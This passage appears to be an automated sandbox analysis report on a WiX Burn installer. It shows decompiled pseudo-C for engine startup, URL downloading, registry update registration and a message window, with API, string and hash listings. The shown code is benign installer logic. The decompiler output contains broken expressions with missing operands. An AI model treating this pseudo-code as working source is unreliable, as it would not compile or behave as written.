									goto L35;
								}
								_push(0xe0000035);
								_push(2);
								E00402003();
								_t98 = 0;
								goto L36;
							}
							_push("Failed to check global conditions");
							goto L35;
						}
						_t83 =  &_v8;
						_t98 = E0040F31A(_t89 + 0x46c, 1,  &_v8);
						__eflags = _t98;
						if(_t98 >= 0) {
							_t98 = E0040F9DC(_t89 + 0x46c);
							__eflags = _t98;
							if(_t98 >= 0) {
								__eflags = _v8;
								if(__eflags != 0) {
									CloseHandle(_v8);
									_t15 =  &_v8;
									 *_t15 = _v8 & 0x00000000;
									__eflags =  *_t15;
								}
								goto L11;
							}
							_push("Failed to connect to elevated parent process.");
							goto L35;
						}
						_push("Failed to create pipes to connect to elevated parent process.");
						goto L35;
					}
					_push("Failed to initialize internal cache functionality.");
					goto L35;
				} else {
					_push("Failed to open log.");
					L35:
					_push(_t98);
					E00430A57();
					L36:
					_pop(_t85);
					L37:
					E0041783B(_t89);
					E004046BD(_t85, _t87, _t89, _t81);
					if( *((intOrPtr*)(_t89 + 0x47c)) != 0xffffffff) {
						_t102 =  *((intOrPtr*)(_t89 + 0x460)) - 1;
						if( *((intOrPtr*)(_t89 + 0x460)) != 1) {
							_t68 = 0;
							__eflags = 0;
						} else {
							_t68 =  *((intOrPtr*)(_t89 + 0x18));
						}
						E0040F8E4(_t85, _t102, _t89 + 0x46c,  *((intOrPtr*)(_t89 + 0xf4)), _t68);
					}
					if(IsWindow( *(_t89 + 0x34)) != 0) {
						PostMessageW( *(_t89 + 0x34), 0x10, 0, 0);
					}
					if(_v8 != 0) {
						CloseHandle(_v8);
					}
					return _t98;
				}
			}
















                                                                                                                                                                  0x004016ed
                                                                                                                                                                  0x004016f0
                                                                                                                                                                  0x004016f1
                                                                                                                                                                  0x004016f5
                                                                                                                                                                  0x00401700
                                                                                                                                                                  0x00401706
                                                                                                                                                                  0x00401714
                                                                                                                                                                  0x00401724
                                                                                                                                                                  0x00401738
                                                                                                                                                                  0x0040173f
                                                                                                                                                                  0x00401741
                                                                                                                                                                  0x0040174d
                                                                                                                                                                  0x00401754
                                                                                                                                                                  0x004017a7
                                                                                                                                                                  0x004017c3
                                                                                                                                                                  0x004017ca
                                                                                                                                                                  0x004017cc
                                                                                                                                                                  0x004017d8
                                                                                                                                                                  0x004017dc
                                                                                                                                                                  0x004017f3
                                                                                                                                                                  0x004017f9
                                                                                                                                                                  0x004017fb
                                                                                                                                                                  0x004017ff
                                                                                                                                                                  0x00401809
                                                                                                                                                                  0x00401809
                                                                                                                                                                  0x004017ff
                                                                                                                                                                  0x00401812
                                                                                                                                                                  0x00401819
                                                                                                                                                                  0x0040181b
                                                                                                                                                                  0x0040182f
                                                                                                                                                                  0x00401831
                                                                                                                                                                  0x0040183e
                                                                                                                                                                  0x00401845
                                                                                                                                                                  0x00401847
                                                                                                                                                                  0x0040185d
                                                                                                                                                                  0x0040185f
                                                                                                                                                                  0x00401861
                                                                                                                                                                  0x0040186a
                                                                                                                                                                  0x0040186d
                                                                                                                                                                  0x0040186f
                                                                                                                                                                  0x00401871
                                                                                                                                                                  0x00401894
                                                                                                                                                                  0x00401899
                                                                                                                                                                  0x004018a1
                                                                                                                                                                  0x004018a3
                                                                                                                                                                  0x004018a5
                                                                                                                                                                  0x004018af
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004018af
                                                                                                                                                                  0x004018a7
                                                                                                                                                                  0x004018ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401892
                                                                                                                                                                  0x00401892
                                                                                                                                                                  0x00401892
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401892
                                                                                                                                                                  0x00401873
                                                                                                                                                                  0x00401876
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401885
                                                                                                                                                                  0x00401887
                                                                                                                                                                  0x00401889
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040188b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040188b
                                                                                                                                                                  0x00401863
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401863
                                                                                                                                                                  0x00401849
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401849
                                                                                                                                                                  0x00401833
                                                                                                                                                                  0x0040181d
                                                                                                                                                                  0x0040181d
                                                                                                                                                                  0x0040181d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040181b
                                                                                                                                                                  0x004017de
                                                                                                                                                                  0x004017e3
                                                                                                                                                                  0x004017e5
                                                                                                                                                                  0x004017ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004017ea
                                                                                                                                                                  0x004017ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004017ce
                                                                                                                                                                  0x00401756
                                                                                                                                                                  0x00401768
                                                                                                                                                                  0x0040176a
                                                                                                                                                                  0x0040176c
                                                                                                                                                                  0x00401784
                                                                                                                                                                  0x00401786
                                                                                                                                                                  0x00401788
                                                                                                                                                                  0x00401794
                                                                                                                                                                  0x00401798
                                                                                                                                                                  0x0040179d
                                                                                                                                                                  0x004017a3
                                                                                                                                                                  0x004017a3
                                                                                                                                                                  0x004017a3
                                                                                                                                                                  0x004017a3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401798
                                                                                                                                                                  0x0040178a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040178a
                                                                                                                                                                  0x0040176e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040176e
                                                                                                                                                                  0x00401743
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401726
                                                                                                                                                                  0x00401726
                                                                                                                                                                  0x004018b4
                                                                                                                                                                  0x004018b4
                                                                                                                                                                  0x004018b5
                                                                                                                                                                  0x004018ba
                                                                                                                                                                  0x004018bb
                                                                                                                                                                  0x004018bc
                                                                                                                                                                  0x004018bd
                                                                                                                                                                  0x004018c3
                                                                                                                                                                  0x004018cf
                                                                                                                                                                  0x004018d1
                                                                                                                                                                  0x004018d8
                                                                                                                                                                  0x004018df
                                                                                                                                                                  0x004018df
                                                                                                                                                                  0x004018da
                                                                                                                                                                  0x004018da
                                                                                                                                                                  0x004018da
                                                                                                                                                                  0x004018ef
                                                                                                                                                                  0x004018ef
                                                                                                                                                                  0x004018ff
                                                                                                                                                                  0x0040190a
                                                                                                                                                                  0x0040190a
                                                                                                                                                                  0x00401914
                                                                                                                                                                  0x00401919
                                                                                                                                                                  0x00401919
                                                                                                                                                                  0x00401925
                                                                                                                                                                  0x00401925

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(?), ref: 004018F7
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0040190A
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00401EA4,?,?), ref: 00401919
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create the message window., xrefs: 0040181D
                                                                                                                                                                  • Failed to set action variables., xrefs: 00401849
                                                                                                                                                                  • Failed to check global conditions, xrefs: 004017CE
                                                                                                                                                                  • Failed while running , xrefs: 004018AF
                                                                                                                                                                  • Failed to open log., xrefs: 00401726
                                                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 00401743
                                                                                                                                                                  • Failed to set layout directory variable to value provided from command-line., xrefs: 0040188B
                                                                                                                                                                  • Failed to create pipes to connect to elevated parent process., xrefs: 0040176E
                                                                                                                                                                  • Failed to set registration variables., xrefs: 00401863
                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 0040187A
                                                                                                                                                                  • Failed to query registration., xrefs: 00401833
                                                                                                                                                                  • Failed to connect to elevated parent process., xrefs: 0040178A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleMessagePostWindow
                                                                                                                                                                  • String ID: Failed to check global conditions$Failed to connect to elevated parent process.$Failed to create pipes to connect to elevated parent process.$Failed to create the message window.$Failed to initialize internal cache functionality.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                  • API String ID: 3586352542-3026528549
                                                                                                                                                                  • Opcode ID: f7b44bc3f11affc01273d5d90a8f4bac3e26a8a3aebfdf9b4024578fffa955ab
                                                                                                                                                                  • Instruction ID: ffe905353efb8c78a0d7f0a80024e4e3b05be755896de8defb37191061d86c5f
                                                                                                                                                                  • Opcode Fuzzy Hash: f7b44bc3f11affc01273d5d90a8f4bac3e26a8a3aebfdf9b4024578fffa955ab
                                                                                                                                                                  • Instruction Fuzzy Hash: AC51C672A00616BBDB16A660CC85FFAB668FF04314F108237F905B61A0E73CEE5497D9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00425C78, Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 174networkfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E00425C78(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, signed short _a24, signed short _a28, WCHAR* _a32) {
				char _v8;
				void _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				char _v28;
				signed short _v32;
				void* _v36;
				long _v40;
				char _v44;
				signed int _t58;
				WCHAR* _t69;
				signed short _t86;
				void* _t91;
				void* _t95;
				void* _t97;

				_v16 = _v16 | 0xffffffff;
				_t90 = _a20;
				_v8 = 0;
				_t95 = 0;
				_v12 = 0;
				_v20 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x20], xmm0");
				if(E00433F88( &_v8,  *_a20, 0) >= 0) {
					_t95 = InternetOpenW(L"Burn", 0, 0, 0, 0);
					if(_t95 != 0) {
						E0043856B(_t91, L"WiX\\Burn", L"DownloadTimeout", 0x78,  &_v12);
						_t58 = _v12;
						if(_t58 != 0) {
							_v12 = _t58 * 0x3e8;
							InternetSetOptionW(_t95, 2,  &_v12, 4);
							InternetSetOptionW(_t95, 6,  &_v12, 4);
							InternetSetOptionW(_t95, 5,  &_v12, 4);
						}
						_t97 = E004253F6(_a4, _a12, _a16, _t95,  &_v8,  *((intOrPtr*)(_t90 + 4)),  *((intOrPtr*)(_t90 + 8)),  &_v36,  &_v44);
						if(_t97 >= 0) {
							E004254B6(_t91, _a32,  &_v20,  &_v16,  &_v28);
							_t97 = E0042515A(_a4, _a12, _a16, _t95,  &_v8,  *((intOrPtr*)(_t90 + 4)),  *((intOrPtr*)(_t90 + 8)), _a32, _a24, _a28, _v36, _v32, _v28, _v24, _v16, _a8);
							if(_t97 >= 0) {
								_t69 = _v20;
								if(_t69 != 0 &&  *_t69 != 0) {
									DeleteFileW(_t69);
								}
							} else {
								E00430A57(_t97, "Failed to download URL: %ls", _v8);
							}
							if(_v16 != 0xffffffff) {
								CloseHandle(_v16);
							}
						} else {
							E00430A57(_t97, "Failed to get size and time for URL: %ls", _v8);
						}
						goto L16;
					} else {
						_t86 = GetLastError();
						_t101 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
						_t97 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "downloadengine.cpp", 0x96, _t97);
						_push("Failed to open internet session");
						goto L2;
					}
				} else {
					_push("Failed to copy download source URL.");
					L2:
					_push(_t97);
					E00430A57();
					L16:
					_t70 = _v20;
					if(_v20 != 0) {
						E004380AB(_t70);
					}
					if(_t95 != 0) {
						InternetCloseHandle(_t95);
					}
					if(_v8 != 0) {
						E004380AB(_v8);
					}
					return _t97;
				}
			}



















                                                                                                                                                                  0x00425c7e
                                                                                                                                                                  0x00425c83
                                                                                                                                                                  0x00425c8d
                                                                                                                                                                  0x00425c90
                                                                                                                                                                  0x00425c92
                                                                                                                                                                  0x00425c95
                                                                                                                                                                  0x00425c98
                                                                                                                                                                  0x00425c9b
                                                                                                                                                                  0x00425c9e
                                                                                                                                                                  0x00425ca5
                                                                                                                                                                  0x00425caa
                                                                                                                                                                  0x00425cb8
                                                                                                                                                                  0x00425cdd
                                                                                                                                                                  0x00425ce1
                                                                                                                                                                  0x00425d28
                                                                                                                                                                  0x00425d2d
                                                                                                                                                                  0x00425d32
                                                                                                                                                                  0x00425d42
                                                                                                                                                                  0x00425d4c
                                                                                                                                                                  0x00425d57
                                                                                                                                                                  0x00425d62
                                                                                                                                                                  0x00425d62
                                                                                                                                                                  0x00425d85
                                                                                                                                                                  0x00425d89
                                                                                                                                                                  0x00425db0
                                                                                                                                                                  0x00425de9
                                                                                                                                                                  0x00425ded
                                                                                                                                                                  0x00425e02
                                                                                                                                                                  0x00425e07
                                                                                                                                                                  0x00425e11
                                                                                                                                                                  0x00425e11
                                                                                                                                                                  0x00425def
                                                                                                                                                                  0x00425df8
                                                                                                                                                                  0x00425dfd
                                                                                                                                                                  0x00425e1b
                                                                                                                                                                  0x00425e20
                                                                                                                                                                  0x00425e20
                                                                                                                                                                  0x00425d8b
                                                                                                                                                                  0x00425d94
                                                                                                                                                                  0x00425d99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425ce3
                                                                                                                                                                  0x00425ce3
                                                                                                                                                                  0x00425cf4
                                                                                                                                                                  0x00425cfe
                                                                                                                                                                  0x00425d0c
                                                                                                                                                                  0x00425d11
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425d11
                                                                                                                                                                  0x00425cba
                                                                                                                                                                  0x00425cba
                                                                                                                                                                  0x00425cbf
                                                                                                                                                                  0x00425cbf
                                                                                                                                                                  0x00425cc0
                                                                                                                                                                  0x00425e26
                                                                                                                                                                  0x00425e26
                                                                                                                                                                  0x00425e2b
                                                                                                                                                                  0x00425e2e
                                                                                                                                                                  0x00425e2e
                                                                                                                                                                  0x00425e35
                                                                                                                                                                  0x00425e38
                                                                                                                                                                  0x00425e38
                                                                                                                                                                  0x00425e42
                                                                                                                                                                  0x00425e47
                                                                                                                                                                  0x00425e47
                                                                                                                                                                  0x00425e52
                                                                                                                                                                  0x00425e52

                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenW.WININET(Burn,00000000,00000000,00000000,00000000), ref: 00425CD7
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00425CE3
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00425E38
                                                                                                                                                                    • Part of subcall function 0043856B: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,00000000,75C08550), ref: 004385C2
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000002,?,00000004), ref: 00425D4C
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00425D57
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00425D62
                                                                                                                                                                    • Part of subcall function 0042515A: CreateFileW.KERNEL32(?,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,75C08550,?,000000FF,?,?,?,00000078), ref: 00425199
                                                                                                                                                                    • Part of subcall function 0042515A: GetLastError.KERNEL32 ref: 004251A7
                                                                                                                                                                    • Part of subcall function 0042515A: VirtualFree.KERNEL32(?,00000000,00008000), ref: 004253D8
                                                                                                                                                                    • Part of subcall function 0042515A: CloseHandle.KERNEL32(?), ref: 004253E7
                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000078,00000000,00000000,?,?,?,?,?,?,?,?,00000078,000000FF), ref: 00425E11
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,00000078,00000000,00000000,?,?,?,?,?,?,?,?,00000078,000000FF), ref: 00425E20
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$Close$HandleOption$ErrorFileLast$CreateDeleteFreeOpenVirtual
                                                                                                                                                                  • String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to get size and time for URL: %ls$Failed to open internet session$WiX\Burn$downloadengine.cpp
                                                                                                                                                                  • API String ID: 328221957-1870125225
                                                                                                                                                                  • Opcode ID: 5b1741da1c1baee1d5113628df0ab2f95a4bc62327bb113644b8d84af0cb052d
                                                                                                                                                                  • Instruction ID: c9df0415d024d7b871bdeb6b7c30a49cd011a8e9d64cffb30f5f8f0ae6371ed4
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b1741da1c1baee1d5113628df0ab2f95a4bc62327bb113644b8d84af0cb052d
                                                                                                                                                                  • Instruction Fuzzy Hash: 96514072E00629BBDF129FA1DC45EEF7BB9EF08710F114156FA04F6190E7398A119BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A3B1, Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 151registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                                  			E0040A3B1(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _t58;
				char* _t59;
				void* _t63;
				void* _t71;

				_t54 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t58 = _a4;
				_t63 = E00409935(__ecx, _t58,  &_v12);
				if(_t63 >= 0) {
					_t63 = E00432129( *((intOrPtr*)(_t58 + 0x4c)), _v12, 0x20006,  &_v8);
					if(_t63 >= 0) {
						if(E00432A16(__ecx, _v8, L"ThisVersionInstalled", "Y") >= 0) {
							if(E00432A16(__ecx, _v8, L"PackageName",  *((intOrPtr*)(_t58 + 0x60))) >= 0) {
								if(E00432A16(_t54, _v8, L"PackageVersion",  *((intOrPtr*)(_t58 + 0x64))) >= 0) {
									if(E00432A16(_t54, _v8, L"Publisher",  *((intOrPtr*)(_t58 + 0x68))) >= 0) {
										_t40 =  *((intOrPtr*)(_t58 + 0xa4));
										if( *((intOrPtr*)(_t58 + 0xa4)) == 0) {
											L16:
											_t59 = L"ReleaseType";
											if(E00432A16(_t54, _v8, _t59,  *((intOrPtr*)(_t58 + 0xb0))) >= 0) {
												_t60 = _a8;
												if(E00409E7D(_t54, _v8, _a8, L"LogonUser", L"InstalledBy") >= 0) {
													if(E00409E7D(_t54, _v8, _t60, L"Date", L"InstalledDate") >= 0) {
														_t71 = E00409E7D(_t54, _v8, _t60, L"InstallerName", L"InstallerName");
														if(_t71 >= 0) {
															_t71 = E00409E7D(_t54, _v8, _t60, L"InstallerVersion", L"InstallerVersion");
															if(_t71 < 0) {
																_push(L"InstallerVersion");
																goto L26;
															}
														} else {
															_push(L"InstallerName");
															goto L26;
														}
													} else {
														_push(L"InstalledDate");
														goto L26;
													}
												} else {
													_push(L"InstalledBy");
													goto L26;
												}
											} else {
												_push(_t59);
												goto L26;
											}
										} else {
											_t71 = E00432A16(_t54, _v8, L"PublishingGroup", _t40);
											if(_t71 >= 0) {
												goto L16;
											} else {
												_push(L"PublishingGroup");
												goto L26;
											}
										}
									} else {
										_push(L"Publisher");
										goto L26;
									}
								} else {
									_push(L"PackageVersion");
									goto L26;
								}
							} else {
								_push(L"PackageName");
								goto L26;
							}
						} else {
							_push(L"ThisVersionInstalled");
							L26:
							_push("Failed to write %ls value.");
							_push(_t71);
							E00430A57();
						}
					} else {
						_push("Failed to create the key for update registration.");
						goto L4;
					}
				} else {
					_push("Failed to get the formatted key path for update registration.");
					L4:
					_push(_t63);
					E00430A57();
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
					_v8 = _v8 & 0x00000000;
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				return _t71;
			}









                                                                                                                                                                  0x0040a3b1
                                                                                                                                                                  0x0040a3b4
                                                                                                                                                                  0x0040a3b5
                                                                                                                                                                  0x0040a3b6
                                                                                                                                                                  0x0040a3ba
                                                                                                                                                                  0x0040a3c0
                                                                                                                                                                  0x0040a3cd
                                                                                                                                                                  0x0040a3d1
                                                                                                                                                                  0x0040a3ee
                                                                                                                                                                  0x0040a3f2
                                                                                                                                                                  0x0040a41c
                                                                                                                                                                  0x0040a43c
                                                                                                                                                                  0x0040a45c
                                                                                                                                                                  0x0040a47c
                                                                                                                                                                  0x0040a488
                                                                                                                                                                  0x0040a490
                                                                                                                                                                  0x0040a4b0
                                                                                                                                                                  0x0040a4b6
                                                                                                                                                                  0x0040a4c8
                                                                                                                                                                  0x0040a4cd
                                                                                                                                                                  0x0040a4e7
                                                                                                                                                                  0x0040a507
                                                                                                                                                                  0x0040a520
                                                                                                                                                                  0x0040a524
                                                                                                                                                                  0x0040a53d
                                                                                                                                                                  0x0040a541
                                                                                                                                                                  0x0040a543
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a543
                                                                                                                                                                  0x0040a526
                                                                                                                                                                  0x0040a526
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a526
                                                                                                                                                                  0x0040a509
                                                                                                                                                                  0x0040a509
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a509
                                                                                                                                                                  0x0040a4e9
                                                                                                                                                                  0x0040a4e9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a4e9
                                                                                                                                                                  0x0040a4ca
                                                                                                                                                                  0x0040a4ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a4ca
                                                                                                                                                                  0x0040a492
                                                                                                                                                                  0x0040a4a0
                                                                                                                                                                  0x0040a4a4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a4a6
                                                                                                                                                                  0x0040a4a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a4a6
                                                                                                                                                                  0x0040a4a4
                                                                                                                                                                  0x0040a47e
                                                                                                                                                                  0x0040a47e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a47e
                                                                                                                                                                  0x0040a45e
                                                                                                                                                                  0x0040a45e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a45e
                                                                                                                                                                  0x0040a43e
                                                                                                                                                                  0x0040a43e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a43e
                                                                                                                                                                  0x0040a41e
                                                                                                                                                                  0x0040a41e
                                                                                                                                                                  0x0040a548
                                                                                                                                                                  0x0040a548
                                                                                                                                                                  0x0040a54d
                                                                                                                                                                  0x0040a54e
                                                                                                                                                                  0x0040a553
                                                                                                                                                                  0x0040a3f4
                                                                                                                                                                  0x0040a3f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a3f4
                                                                                                                                                                  0x0040a3d3
                                                                                                                                                                  0x0040a3d3
                                                                                                                                                                  0x0040a3f9
                                                                                                                                                                  0x0040a3f9
                                                                                                                                                                  0x0040a3fa
                                                                                                                                                                  0x0040a400
                                                                                                                                                                  0x0040a55a
                                                                                                                                                                  0x0040a55f
                                                                                                                                                                  0x0040a565
                                                                                                                                                                  0x0040a565
                                                                                                                                                                  0x0040a56d
                                                                                                                                                                  0x0040a572
                                                                                                                                                                  0x0040a572
                                                                                                                                                                  0x0040a57c

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,0040B25E,InstallerVersion,InstallerVersion,00000000,0040B25E,InstallerName,InstallerName,00000000,0040B25E,Date,InstalledDate,00000000,0040B25E,LogonUser), ref: 0040A55F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                                                  • API String ID: 3535843008-2703781546
                                                                                                                                                                  • Opcode ID: 27e501d1c470a84876b022b69e58a30ad4332b1f26f3dfda86ff1c574e0582dd
                                                                                                                                                                  • Instruction ID: 7f9aecffbb62b5309411c5e59361cf3eedd38465453835f14176d3c8c87c9085
                                                                                                                                                                  • Opcode Fuzzy Hash: 27e501d1c470a84876b022b69e58a30ad4332b1f26f3dfda86ff1c574e0582dd
                                                                                                                                                                  • Instruction Fuzzy Hash: D841F731E80735B7DB226651CD02F6E7964BF14B55F200177FA00B62E1D7BCAE60A68E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004175BE, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 132registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E004175BE(void** _a4) {
				intOrPtr _v8;
				void _v12;
				struct tagMSG _v40;
				struct _WNDCLASSW _v80;
				int _t35;
				signed int _t36;
				signed int _t37;
				struct HWND__* _t44;
				int _t47;
				signed short _t57;
				signed short _t60;
				void** _t64;
				signed int _t65;
				void* _t75;
				struct HWND__* _t77;

				_t64 = _a4;
				_t65 = 0xa;
				_t35 = memset( &_v80, 0, _t65 << 2);
				_push(7);
				_t77 = 0;
				_t36 = memset( &_v40, _t35, 0 << 2);
				_t75 = _t64[2];
				_v12 = 0;
				_v8 = 0;
				_t37 = _t36 & 0xffffff00 |  *((intOrPtr*)(_t75 + 0x458)) == 0x00000001;
				_a4 = _t37;
				if(_t37 == 0 || TlsSetValue( *(_t75 + 0x464),  *(_t75 + 0x47c)) != 0) {
					_v80.hInstance = _t64[1];
					_v80.lpfnWndProc = E00417759;
					_v80.lpszClassName = L"WixBurnMessageWindow";
					if(RegisterClassW( &_v80) != 0) {
						_v12 = _a4;
						_v8 = _t75 + 0xb8;
						_t44 = CreateWindowExW(0x80, _v80.lpszClassName, _t77, 0x90000000, 0x80000000, 8, _t77, _t77, _t77, _t77, _t64[1],  &_v12);
						if(_t44 != 0) {
							 *(_t75 + 0x3a8) = _t44;
							SetEvent( *_t64);
							while(1) {
								_t47 = GetMessageW( &_v40, _t77, _t77, _t77);
								if(_t47 == 0) {
									break;
								}
								if(_t47 == 0xffffffff) {
									_t77 = 0x8000ffff;
									_push("Unexpected return value from message pump.");
									L14:
									_push(_t77);
									E00430A57();
									goto L15;
								}
								if(IsDialogMessageW(_v40,  &_v40) == 0) {
									TranslateMessage( &_v40);
									DispatchMessageW( &_v40);
								}
							}
							goto L15;
						}
						_t57 = GetLastError();
						_t80 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
						_t77 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "uithread.cpp", 0x95, _t77);
						_push("Failed to create window.");
						goto L14;
					}
					_t60 = GetLastError();
					_t83 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					_t77 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "uithread.cpp", 0x8b, _t77);
					_push("Failed to register window.");
					goto L14;
				} else {
					_t77 = 0x8007139f;
					L15:
					UnregisterClassW(L"WixBurnMessageWindow", _t64[1]);
					return _t77;
				}
			}


















                                                                                                                                                                  0x004175c5
                                                                                                                                                                  0x004175ce
                                                                                                                                                                  0x004175d2
